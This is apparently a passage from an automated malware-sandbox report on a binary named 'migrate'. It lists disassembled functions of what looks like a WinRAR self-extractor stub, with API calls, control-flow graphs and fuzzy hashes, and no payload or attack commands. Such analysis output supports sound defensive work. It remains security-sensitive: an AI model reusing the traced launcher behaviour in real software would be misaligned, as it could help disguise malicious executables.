                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23b87e63729b6594c27c3efc98e4caf534e4fd1c184cee7e95d5989228e65eaa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC613235904364AFD320ABB4FC49F6B3BECAB15704F040429F805966E2EBB499E4C762
                                                                                                                                                                                                    Function 0011A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1036 11a69b-11a6bf call 12ec50 1039 11a6c1-11a6ce FindFirstFileW 1036->1039 1040 11a727-11a730 FindNextFileW 1036->1040 1041 11a6d0-11a6e2 call 11bb03 1039->1041 1042 11a742-11a7ff call 120602 call 11c310 call 1215da * 3 1039->1042 1040->1042 1043 11a732-11a740 GetLastError 1040->1043 1050 11a6e4-11a6fc FindFirstFileW 1041->1050 1051 11a6fe-11a707 GetLastError 1041->1051 1048 11a804-11a811 1042->1048 1045 11a719-11a722 1043->1045 1045->1048 1050->1042 1050->1051 1054 11a717 1051->1054 1055 11a709-11a70c 1051->1055 1054->1045 1055->1054 1057 11a70e-11a711 1055->1057 1057->1054 1059 11a713-11a715 1057->1059 1059->1045
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6C4
                                                                                                                                                                                                      • Part of subcall function 0011BB03: _wcslen.LIBCMT ref: 0011BB27
                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6F2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6FE
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A728
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0011A592,000000FF,?,?), ref: 0011A734
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 42610566-0
                                                                                                                                                                                                    • Opcode ID: 98b81bbe765e984077ce6c728cd75f8347caae8710c569c5ea852699efef990b
                                                                                                                                                                                                    • Instruction ID: dfec2e00569deb8a3570b08c3d0782796549f0e322d99712cca5767d7c4503b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98b81bbe765e984077ce6c728cd75f8347caae8710c569c5ea852699efef990b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3417B76901115ABCB29DF68DC88AEAF7B8BF49350F5042A6F569E3240D7346ED0CF90
                                                                                                                                                                                                    Function 00137DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00137DC4,?,0014C300,0000000C,00137F1B,?,00000002,00000000), ref: 00137E0F
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00137DC4,?,0014C300,0000000C,00137F1B,?,00000002,00000000), ref: 00137E16
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00137E28
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                    • Opcode ID: 1583b4f13225aebad09fedf70ac5e4e762be5149a1c7f390e2bf86037af74021
                                                                                                                                                                                                    • Instruction ID: 05596f558c009a6362ad162b3d913eec15e4438153de462a0b06b0d197015f15
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1583b4f13225aebad09fedf70ac5e4e762be5149a1c7f390e2bf86037af74021
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49E08C75004148EFCF216F20ED0AA8A7FBAEF11341F004464F8298B572CB36DE92CB90
                                                                                                                                                                                                    Function 0011848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 94de0165a4ad0095345c2db9482286d836f8eee8a12256dae15b341117fd423f
                                                                                                                                                                                                    • Instruction ID: 2fd90a5c8ae931c0a71922af57dd819428bf15abdd1d989df3596786bbdb8cd9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94de0165a4ad0095345c2db9482286d836f8eee8a12256dae15b341117fd423f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA820D71904245AEDF1DDF64C891BFEBBB9BF15300F0881B9E8599B182DB315AC9CB60
                                                                                                                                                                                                    Function 0012B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0012B7E5
                                                                                                                                                                                                      • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                      • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012B8D1
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B8EF
                                                                                                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0012B902
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0012B910
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0012B91A
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0012B93D
                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0012B960
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0012B983
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0012B99E
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,001435F4), ref: 0012B9B1
                                                                                                                                                                                                      • Part of subcall function 0012D453: _wcslen.LIBCMT ref: 0012D47D
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0012B9B8
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012BA24
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: GetDlgItem.USER32(00000068,0016FCB8), ref: 0012D4E8
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0012AF07,00000001,?,?,0012B7B9,0014506C,0016FCB8,0016FCB8,00001000,00000000,00000000), ref: 0012D510
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0012D51B
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000C2,00000000,001435F4), ref: 0012D529
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0012D53F
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0012D559
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0012D59D
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0012D5AB
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0012D5BA
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0012D5E1
                                                                                                                                                                                                      • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000C2,00000000,001443F4), ref: 0012D5F0
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0012BA68
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0012BA90
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0012BAAE
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012BAC2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0012BAF4
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0012BB43
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012BB7C
                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0012BBD0
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0012BBEA
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0012BC47
                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0012BC6F
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0012BCB9
                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0012BCE2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0012BCEB
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012BD1E
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012BD7D
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,001435F4), ref: 0012BD94
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0012BD9D
                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0012BDAC
                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0012BDBB
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012BE68
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0012BEBE
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012BEE8
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0012BF32
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0012BF4C
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0012BF55
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0012BF6B
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0012BF85
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,0015A472), ref: 0012BFA7
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0012C007
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012C01A
                                                                                                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0012C0BD
                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0012C197
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0012C1D9
                                                                                                                                                                                                      • Part of subcall function 0012C73F: __EH_prolog.LIBCMT ref: 0012C744
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012C1FD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$c:\programdata$winrarsfxmappingfile.tmp
                                                                                                                                                                                                    • API String ID: 3445078344-4126391903
                                                                                                                                                                                                    • Opcode ID: 1d15ff9914416fbf52ffeaf6689b34e56fb475bf1458ac3c081a573f8f179136
                                                                                                                                                                                                    • Instruction ID: 9b0c95bf96e5c7917576ac08b69d7023ea51f00c9611205caf660b3d91517a1a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d15ff9914416fbf52ffeaf6689b34e56fb475bf1458ac3c081a573f8f179136
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED42D470948364FEEB219BB0AC8AFBE777CAB11700F040165F645B64E2CB745AD4CB61
                                                                                                                                                                                                    Function 00120863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 268 120863-120886 call 12ec50 GetModuleHandleW 271 1208e7-120b48 268->271 272 120888-12089f GetProcAddress 268->272 273 120c14-120c40 GetModuleFileNameW call 11c29a call 120602 271->273 274 120b4e-120b59 call 1375fb 271->274 275 1208a1-1208b7 272->275 276 1208b9-1208c9 GetProcAddress 272->276 291 120c42-120c4e call 11b146 273->291 274->273 286 120b5f-120b8d GetModuleFileNameW CreateFileW 274->286 275->276 277 1208e5 276->277 278 1208cb-1208e0 276->278 277->271 278->277 288 120c08-120c0f CloseHandle 286->288 289 120b8f-120b9b SetFilePointer 286->289 288->273 289->288 292 120b9d-120bb9 ReadFile 289->292 298 120c50-120c5b call 12081b 291->298 299 120c7d-120ca4 call 11c310 GetFileAttributesW 291->299 292->288 294 120bbb-120be0 292->294 296 120bfd-120c06 call 120371 294->296 296->288 305 120be2-120bfc call 12081b 296->305 298->299 307 120c5d-120c7b CompareStringW 298->307 308 120ca6-120caa 299->308 309 120cae 299->309 305->296 307->299 307->308 308->291 311 120cac 308->311 312 120cb0-120cb5 309->312 311->312 313 120cb7 312->313 314 120cec-120cee 312->314 317 120cb9-120ce0 call 11c310 GetFileAttributesW 313->317 315 120cf4-120d0b call 11c2e4 call 11b146 314->315 316 120dfb-120e05 314->316 327 120d73-120da6 call 114092 AllocConsole 315->327 328 120d0d-120d6e call 12081b * 2 call 11e617 call 114092 call 11e617 call 12a7e4 315->328 323 120ce2-120ce6 317->323 324 120cea 317->324 323->317 326 120ce8 323->326 324->314 326->314 333 120df3-120df5 ExitProcess 327->333 334 120da8-120ded GetCurrentProcessId AttachConsole call 133e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0012087C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0012088E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001208BF
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00120B69
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00120B83
                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00120B93
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00143C7C,00000000), ref: 00120BB1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00120C09
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00120C1E
                                                                                                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00143C7C,?,00000000,?,00000800), ref: 00120C72
                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00143C7C,00000800,?,00000000,?,00000800), ref: 00120C9C
                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,00143D44,00000800), ref: 00120CD8
                                                                                                                                                                                                      • Part of subcall function 0012081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00120836
                                                                                                                                                                                                      • Part of subcall function 0012081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0011F2D8,Crypt32.dll,00000000,0011F35C,?,?,0011F33E,?,?,?), ref: 00120858
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00120D4A
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00120D96
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    • AllocConsole.KERNEL32 ref: 00120D9E
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00120DA8
                                                                                                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00120DAF
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00120DC4
                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00120DD5
                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00120DDC
                                                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00120DE7
                                                                                                                                                                                                    • FreeConsole.KERNEL32 ref: 00120DED
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00120DF5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                                                                    • API String ID: 1207345701-3298887752
                                                                                                                                                                                                    • Opcode ID: 4733f38eb058c14cf205a427fee6bd3cfcf3f9792f0747139b8c1d15131c4c95
                                                                                                                                                                                                    • Instruction ID: cb9c800d5b81eff29eec42c01095fd6b1b24d8f676c75d54ce49277e3260fe2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4733f38eb058c14cf205a427fee6bd3cfcf3f9792f0747139b8c1d15131c4c95
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41D1A4B1408394ABD331DF90D989BDFBBE8BF85704F504A1DF1A9A7161C7B08658CB62
                                                                                                                                                                                                    Function 0012C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 347 12c73f-12c757 call 12eb78 call 12ec50 352 12d40d-12d418 347->352 353 12c75d-12c787 call 12b314 347->353 353->352 356 12c78d-12c792 353->356 357 12c793-12c7a1 356->357 358 12c7a2-12c7b7 call 12af98 357->358 361 12c7b9 358->361 362 12c7bb-12c7d0 call 121fbb 361->362 365 12c7d2-12c7d6 362->365 366 12c7dd-12c7e0 362->366 365->362 367 12c7d8 365->367 368 12c7e6 366->368 369 12d3d9-12d404 call 12b314 366->369 367->369 371 12c9be-12c9c0 368->371 372 12ca5f-12ca61 368->372 373 12ca7c-12ca7e 368->373 374 12c7ed-12c7f0 368->374 369->357 380 12d40a-12d40c 369->380 371->369 378 12c9c6-12c9d2 371->378 372->369 376 12ca67-12ca77 SetWindowTextW 372->376 373->369 377 12ca84-12ca8b 373->377 374->369 379 12c7f6-12c850 call 12a64d call 11bdf3 call 11a544 call 11a67e call 116edb 374->379 376->369 377->369 381 12ca91-12caaa 377->381 382 12c9e6-12c9eb 378->382 383 12c9d4-12c9e5 call 137686 378->383 436 12c98f-12c9a4 call 11a5d1 379->436 380->352 387 12cab2-12cac0 call 133e13 381->387 388 12caac 381->388 385 12c9f5-12ca00 call 12b48e 382->385 386 12c9ed-12c9f3 382->386 383->382 392 12ca05-12ca07 385->392 386->392 387->369 401 12cac6-12cacf 387->401 388->387 398 12ca12-12ca32 call 133e13 call 133e3e 392->398 399 12ca09-12ca10 call 133e13 392->399 424 12ca34-12ca3b 398->424 425 12ca4b-12ca4d 398->425 399->398 405 12cad1-12cad5 401->405 406 12caf8-12cafb 401->406 410 12cb01-12cb04 405->410 411 12cad7-12cadf 405->411 406->410 413 12cbe0-12cbee call 120602 406->413 418 12cb11-12cb2c 410->418 419 12cb06-12cb0b 410->419 411->369 416 12cae5-12caf3 call 120602 411->416 426 12cbf0-12cc04 call 13279b 413->426 416->426 437 12cb76-12cb7d 418->437 438 12cb2e-12cb68 418->438 419->413 419->418 431 12ca42-12ca4a call 137686 424->431 432 12ca3d-12ca3f 424->432 425->369 427 12ca53-12ca5a call 133e2e 425->427 446 12cc11-12cc62 call 120602 call 12b1be GetDlgItem SetWindowTextW SendMessageW call 133e49 426->446 447 12cc06-12cc0a 426->447 427->369 431->425 432->431 453 12c855-12c869 SetFileAttributesW 436->453 454 12c9aa-12c9b9 call 11a55a 436->454 440 12cbab-12cbce call 133e13 * 2 437->440 441 12cb7f-12cb97 call 133e13 437->441 464 12cb6a 438->464 465 12cb6c-12cb6e 438->465 440->426 475 12cbd0-12cbde call 1205da 440->475 441->440 458 12cb99-12cba6 call 1205da 441->458 483 12cc67-12cc6b 446->483 447->446 452 12cc0c-12cc0e 447->452 452->446 459 12c90f-12c91f GetFileAttributesW 453->459 460 12c86f-12c8a2 call 11b991 call 11b690 call 133e13 453->460 454->369 458->440 459->436 470 12c921-12c930 DeleteFileW 459->470 490 12c8a4-12c8b3 call 133e13 460->490 491 12c8b5-12c8c3 call 11bdb4 460->491 464->465 465->437 470->436 474 12c932-12c935 470->474 478 12c939-12c965 call 114092 GetFileAttributesW 474->478 475->426 487 12c937-12c938 478->487 488 12c967-12c97d MoveFileW 478->488 483->369 484 12cc71-12cc85 SendMessageW 483->484 484->369 487->478 488->436 492 12c97f-12c989 MoveFileExW 488->492 490->491 497 12c8c9-12c908 call 133e13 call 12fff0 490->497 491->454 491->497 492->436 497->459
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0012C744
                                                                                                                                                                                                      • Part of subcall function 0012B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0012B3FB
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0012CA0A
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0012CA13
                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0012CA71
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0012CAB3
                                                                                                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0012CBFB
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0012CC36
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0012CC46
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0015A472), ref: 0012CC54
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0012CC7F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
